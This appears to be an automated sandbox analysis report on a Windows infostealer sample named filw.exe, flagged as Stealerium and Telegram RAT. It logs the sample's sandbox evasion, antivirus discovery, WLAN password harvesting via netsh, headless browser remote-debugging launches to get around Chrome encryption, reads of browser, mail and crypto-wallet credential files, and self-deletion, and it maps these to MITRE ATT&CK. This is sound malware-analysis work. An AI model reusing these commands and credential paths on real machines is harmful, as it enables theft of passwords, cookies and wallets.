Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 99857	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 99732	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 99620	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 99326	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 99214	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 599102	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 598981	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 598864	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 598607	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 96799	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 96674	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 96549	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 96424	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 96306	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 99391	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 99303	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 99176	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 99038	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 98933	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 98794	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 98462	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 98144	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 98018	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 97896	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 97771	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 97646	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 97506	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591927	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591802	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591677	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591552	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591425	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591300	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591175	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591050	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 590926	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 590798	Jump to behavior

Source: filw.exe	Binary or memory string: vmicshutdown
Source: filw.exe	Binary or memory string: vmware
Source: filw.exe	Binary or memory string: vmicvss
Source: filw.exe, 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D128E6000.00000004.00000800.00020000.00000000.sdmp, Info.txt.0.dr	Binary or memory string: VirtualMachine: False
Source: filw.exe	Binary or memory string: VirtualMachine:
Source: filw.exe, 00000000.00000002.2001203296.0000019D2AC03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: filw.exe	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\filw.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\filw.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\filw.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: filw.exe, Decryptor.cs	Reference to suspicious API methods: WinApi.LoadLibrary(sPath + "\\mozglue.dll")
Source: filw.exe, Decryptor.cs	Reference to suspicious API methods: WinApi.GetProcAddress(_hNss3, "NSS_Init")
Source: filw.exe, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly

Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5be28a57-b86d-4b0e-85c0-f6e6ec846e1e.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /PID 7432
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /T 2 /NOBREAK

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\taskkill.exe taskkill /F /PID 7432

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match

File source: filw.exe, type: SAMPLE

Source: C:\Users\user\Desktop\filw.exe	Queries volume information: C:\Users\user\Desktop\filw.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\filw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: filw.exe, 00000000.00000002.2002880618.0000019D2B05A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Stealerium

Source: Yara match	File source: filw.exe, type: SAMPLE
Source: Yara match	File source: 0.0.filw.exe.19d101d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1993398707.0000019D12A43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1993398707.0000019D128E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1993398707.0000019D12552000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: filw.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\6cb9ab6037d3b35610fdf4df320f3b9a\user@088753_en-CH.zip, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 00000000.00000002.1993398707.0000019D12496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: filw.exe PID: 7432, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: filw.exe, 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: filw.exe, 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 4com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: filw.exe, 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet2
Source: filw.exe, 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 0C:\Users\user\AppData\Roaming\Ethereum\keystore2
Source: filw.exe, 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: filw.exe, 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: &C:\Users\user\AppData\Roaming\Binance2
Source: filw.exe, 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: filw.exe, 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: filw.exe, 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\filw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\filw.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: filw.exe, type: SAMPLE
Source: Yara match	File source: 0.0.filw.exe.19d101d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: filw.exe PID: 7432, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\filw.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging

Yara detected Stealerium

Source: Yara match	File source: filw.exe, type: SAMPLE
Source: Yara match	File source: 0.0.filw.exe.19d101d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1993398707.0000019D12A43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1993398707.0000019D128E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1993398707.0000019D12552000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: filw.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\6cb9ab6037d3b35610fdf4df320f3b9a\user@088753_en-CH.zip, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 00000000.00000002.1993398707.0000019D12496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: filw.exe PID: 7432, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	131 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	111 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	124 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	111 Process Injection	1 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	241 Security Software Discovery	Distributed Component Object Model	1 Email Collection	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	1 Clipboard Data	15 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	251 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	111 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report filw.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Stealerium

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
filw.exe